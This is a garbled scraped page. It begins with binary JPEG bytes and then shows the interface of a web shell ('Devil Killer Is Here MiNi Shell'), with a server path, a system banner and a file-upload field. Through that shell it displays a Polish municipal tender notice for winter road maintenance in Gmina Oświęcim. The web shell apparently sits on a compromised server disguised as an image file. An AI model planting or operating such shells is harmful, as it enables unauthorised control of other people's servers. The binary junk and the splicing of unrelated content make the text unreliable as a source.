JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231110/0048779801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zimowe utrzymanie dróg gminnych w sezonie zimowym 2023/2024 w Gminie Oświęcim w zakresie sołectwa: Harmęże - Rajsko </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA OŚWIĘCIM</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 072181876</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zamkowa 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oświęcim</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@gminaoswiecim.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminaoswiecim.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zimowe utrzymanie dróg gminnych w sezonie zimowym 2023/2024 w Gminie Oświęcim w zakresie sołectwa: Harmęże - Rajsko </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f6996d02-7fa7-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00487798</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00010128/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Zimowe utrzymanie dróg gminnych w sezonie zimowym 2023/2024 w Gminie Oświęcim w zakresie sołectwa: Harmęże - Rajsko</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.malopolska.pl/ugoswiecim,m,418709,2023.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-propublico.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">13.1.	W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy on-line działającej pod adresem https://e-propublico.pl.<br/>13.2.	Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>13.3.	Na Platformie postępowanie prowadzone jest pod nazwą: ”Zimowe utrzymanie dróg gminnych w sezonie zimowym 2023/2024 w Gminie Oświęcim w zakresie sołectwa: Harmęże - Rajsko” – znak sprawy: WI.2712.20.2023.<br/>13.4.	Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z Platformy określone w Regulaminie zamieszczonym na stronie internetowej https://e-propublico.pl oraz uznaje go za wiążący.<br/>13.5.	Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto na Platformie.<br/>13.6.	Do złożenia oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy ważnego kwalifikowanego podpisu elektronicznego, podpisu zaufanego lub podpisu osobistego.<br/>13.7.	Ilekroć w niniejszej SWZ jest mowa o:<br/>1)	podpisie zaufanym – należy przez to rozumieć podpis, o którym mowa art. 3 pkt 14a ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (t.j. Dz.U. z 2023r. poz. 57);<br/>2)	podpisie osobistym – należy przez to rozumieć podpis, o którym mowa w art. z art. 2 ust. 1 pkt 9 ustawy z 6 sierpnia 2010 r. o dowodach osobistych (t.j. Dz.U. z 2022r. poz. 67).<br/>13.8.	Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu elektronicznego:<br/>1)	dokumenty sporządzone i przesyłane w formacie .pdf zaleca się podpisywać kwalifikowanym podpisem elektronicznym w formacie PAdES;<br/>2)	dokumenty sporządzone i przesyłane w formacie innym niż .pdf (np.: .doc, .docx, .xlsx, .xml) zaleca się podpisywać kwalifikowanym podpisem elektronicznym w formacie XAdES;<br/>3)	do składania kwalifikowanego podpisu elektronicznego zaleca się stosowanie algorytmu SHA-2 (lub wyższego)...<br/>dalsza część w pkt 13 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zgodnie z opisem pkt 28 SWZ <br/>OCHRONA DANYCH OSOBOWYCH</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">zgodnie z opisem pkt 28 SWZ <br/>OCHRONA DANYCH OSOBOWYCH</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WI.2712.20.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres usługi obejmuje w szczególności:<br/>1)	Odśnieżania dróg, chodników, zatok autobusowych, placów itp.,<br/>2)	Zwalczanie i likwidacja śliskości zimowej (gołoledzi) poprzez stosowanie materiałów uszorstniających do posypywania: <br/>- piasek i żwiry, drobne kruszywa naturalne, grysy o uziarnieniu 2-4mm<br/>- mieszanka piaskowo solna w proporcji 70% piasku, 30% soli<br/>3)	Wykonywanie innych prac i podejmowanie działań organizacyjno-technicznych niezbędnych do należytego wykonania przedmiotu zamówienia, w celu zapewnienia przejezdności i przejścia oraz ograniczenia zakłóceń płynności ruchu drogowego, wywołanych opadami śniegu, deszczu ze śniegiem, marznącej mżawki lub śliskości,<br/> Uwagi dodatkowe:<br/>1.	Rozpoczęcie wykonywania przedmiotu umowy, Wykonawca podejmie maksymalnie do 2 godzin od chwili zgłoszenia przez pracownika Zamawiającego.<br/>2.	W razie wystąpienia obfitych opadów śniegu, deszczu ze śniegiem Wykonawca podejmie natychmiastowe wykonywanie przedmiotu umowy bez uzgodnienia z pracownikiem Zamawiającego.<br/>3.	Przedmiot umowy wykonywany będzie w dni robocze, soboty, niedziele i święta.<br/>4.	Wykonawca przedmiotu umowy zobowiązany jest do składania meldunków obejmujących informacje określone w pkt. 5 Zamawiającemu każdego dnia roboczego (od poniedziałku do piątku z wyłączeniem dni wolnych od pracy) do godz. 11:00, telefonicznie lub e-mailem z podaniem czasookresu pracy obejmującej informacje dotyczące przedmiotu umowy wykonywanego w dniu(dniach) poprzednim złożenia tego meldunku.<br/>5.	Meldunek o którym mowa w pkt. 4 powinien zawierać następujące informacje:<br/>a) rodzaj zrealizowanego przedmiotu umowy,<br/> b) datę i godzinę rozpoczęcia oraz zakończenia realizacji przedmiotu umowy z podziałem na poszczególne sołectwa,<br/> c) dane pojazdu realizującego przedmiot umowy na danym sołectwie, umożliwiające jego identyfikację w systemie monitoringu pracy sprzętu, o którym mowa w § 4 Istotnych Postanowień Umowy Załącznik Nr 9 do SWZ.<br/>6.	Niezłożenie meldunku przez Wykonawcę w terminie o którym mowa w ust. 4 lub niezawierającego informacji o których mowa w ust. 5 będzie równoznaczne z niewykonywaniem przedmiotu umowy.<br/>7. Wykonawca zobowiązuje się iż na dzień rozpoczęcia wykonywania przedmiotu umowy wyposaży pojazdy, przeznaczone do wykonywania usługi określonej w umowie w urządzenie zapewniające monitoring pracy sprzętu. Urządzenie ma rejestrować dane związane z pracą pojazdów. Wykonawca zapewni dostęp on-line Zamawiającemu do danych znajdujących się na serwerze oraz dostarczy Zamawiającemu indywidualne konto do logowania (najpóźniej w dniu rozpoczęcia przedmiotu umowy). Urządzenie zamontowane na pojazdach oraz oprogramowanie powinny umożliwić Zamawiającemu pozyskanie na bieżąco (on-line) informacji dotyczących pracy pojazdu w zakresie: trasy, prędkości i czasu przejazdu, aktualnego położenia pojazdu i miejsc zatrzymania. Oprogramowanie ma rejestrować i zapisywać w/w dane w taki sposób, aby umożliwić Zamawiającemu dostęp do nich przez cały okres obowiązywania zamówienia. Wykonawca jest zobowiązany do zapewnienia sprawnego, ciągłego działania oprogramowania. Koszty związane z wyposażeniem pojazdów w odbiorniki GPS oraz koszty związane z korzystaniem przez Zamawiającego z oprogramowania oraz dostępu do danych z monitoringu obciążają Wykonawcę. Wyposażenie pojazdów w odbiorniki GPS oraz monitoring pracy sprzętu Wykonawcy ma służyć Zamawiającemu jako system kontroli nad realizacją zamówienia.<br/>8. Wykonawca zobowiązuje się do zabezpieczenia wymaganego przez Zamawiającego sprzętu, sprawnego technicznie wraz z obsługą do wykonywania przedmiotu umowy.<br/>9. Wykonawca zobowiązuje się wobec Zamawiającego do usuwania i pokrywania kosztów wszelkich szkód oraz zaspokojenia roszczeń związanych z realizacją zadań częściowych będących przedmiotem zamówienia, a w szczególności Wykonawca ponosić będzie pełną odpowiedzialność cywilną za wszelkie szkody związane z realizacją przedmiotu umowy, w tym również za szkody poniesione przez osoby trzecie w przypadku ich powstania z przyczyny leżącej po stronie Wykonawcy, w tym w przypadku nienależytego wykonania przedmiotu umowy (uszkodzenia: ogrodzeń, uzbrojenia technicznego dróg - kanalizacji, nawierzchni dróg, połamanie drzewek, krzewów itp.).<br/>10.Wykonawca zobowiązuje się do zawarcia umowy ubezpieczenia od odpowiedzialności cywilnej w zakresie przedmiotu umowy.<br/>11. Na wszystkie materiały stosowane do zimowego utrzymania dróg Wykonawca zobowiązany jest posiadać świadectwo dopuszczenia do stosowania w budownictwie. Odpowiedzialność za stosowanie materiałów innych niż w/w ciąży na Wykonawcy.<br/>12. Rozliczenie Wykonawcy za wykonane usługi będzie następować na podstawie rzeczywistych godzin pracy wg cen jednostkowych określonych w ofercie tj.:<br/>1/ cena za 1 godzinę odśnieżania <br/>2/ cena za 1 godzinę posypywania włącznie z materiałem do posypywania (materiał uszorstniający: piasek i żwiry, drobne kruszywa naturalne, grysy o uziarnieniu 2-4mm)<br/>3/cena za 1 godzinę odśnieżania wraz z posypywaniem włącznie z materiałem do posypywania (materiał uszorstniający: piasek i żwiry, drobne kruszywa naturalne, grysy o uziarnieniu 2-4mm)<br/>Materiał stosowany do uszorstniania nawierzchni nie może zawierać zanieczyszczeń ilastych i gliniastych. <br/>4/ cena za 1 godzinę posypywania włącznie z materiałem do posypywania (mieszanka piaskowo solna w proporcji 70% piasku 30% soli) <br/>5/ cena za 1 godzinę odśnieżania wraz z posypywaniem włącznie z materiałem do posypywania (mieszanka piaskowo solna w proporcji 70% piasku 30% soli) <br/>6/ cena za 1 godzinę odśnieżania chodników <br/>Szczegółowy zakres, warunki realizacji, rozliczenie przedmiotu zamówienia został określony w nin. SWZ oraz w Istotnych Postanowieniach Umowy – Załącznik Nr 9 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena 60%<br/>Termin płatności faktury 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa<br/>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące zdolności technicznej lub zawodowej: <br/>a) Wykonawca spełni warunek, jeżeli wykaże że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał co najmniej jedną usługę w zakresie odśnieżania i usuwania gołoledzi na drogach i chodnikach o wartości <br/>min. 25 000 zł brutto,<br/>b) Wykonawca spełni przedmiotowy warunek jeżeli wykaże dostęp sprzętu i środków transportowych w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami tj. :<br/>- ciągnik wraz z pługiem i rozsiewaczem – 1 szt.<br/>- ładowarka - 1 szt. <br/>- spycharka / koparko-spycharka - 1 szt. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy w sprawie grupy kapitałowej<br/> Załącznik Nr 8 do SWZ<br/>Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz.U. z 2023r. poz. 1689), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.<br/>Odpis lub informacja z KRS lub CEIDG<br/>Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast &#34;Odpisu lub informacji z KRS lub CEIDG&#34; składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury, wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz usług – Załącznik Nr 6 do SWZ<br/>Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, tj. co najmniej jedną usługę w zakresie odśnieżania i usuwania gołoledzi na drogach i chodnikach o wartości min. 25 000 zł brutto, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, wykaz dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/>Wykaz sprzętu - Załącznik Nr 7 do SWZ<br/>Wykaz sprzętu dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami.<br/>Wykonawca wykaże, że dysponuje sprzętem i środkami transportowymi niezbędnymi do świadczenia usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami tj. :<br/>- ciągnik wraz z pługiem i rozsiewaczem – 1 szt. <br/>- ładowarka - 1 szt. <br/>- spycharka / koparko-spycharka - 1 szt.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz ofertowy - Załącznik Nr 1 do SWZ<br/>Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału Załącznik Nr 2 do SWZ<br/>Aktualne na dzień składania ofert oświadczenie Wykonawcy stanowiące wstępne potwierdzenie spełniania warunków udziału w postępowaniu oraz brak podstaw wykluczenia<br/>Zobowiązanie podmiotu udostępniającego zasoby<br/> Załącznik Nr 3 do SWZ<br/>Zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia Załącznik Nr 4 do SWZ<br/>Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, składane na podstawie art. 117 ust. 4 ustawy Pzp w zakresie wykazu dostaw, usług lub robót budowlanych, które wykonają wykonawcy wspólnie ubiegający się o udzielenie zamówienia.<br/>Oświadczenie podmiotu udostępniającego zasoby<br/> Załącznik Nr 5 do SWZ<br/>Oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim wykonawca powołuje się na jego zasoby. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 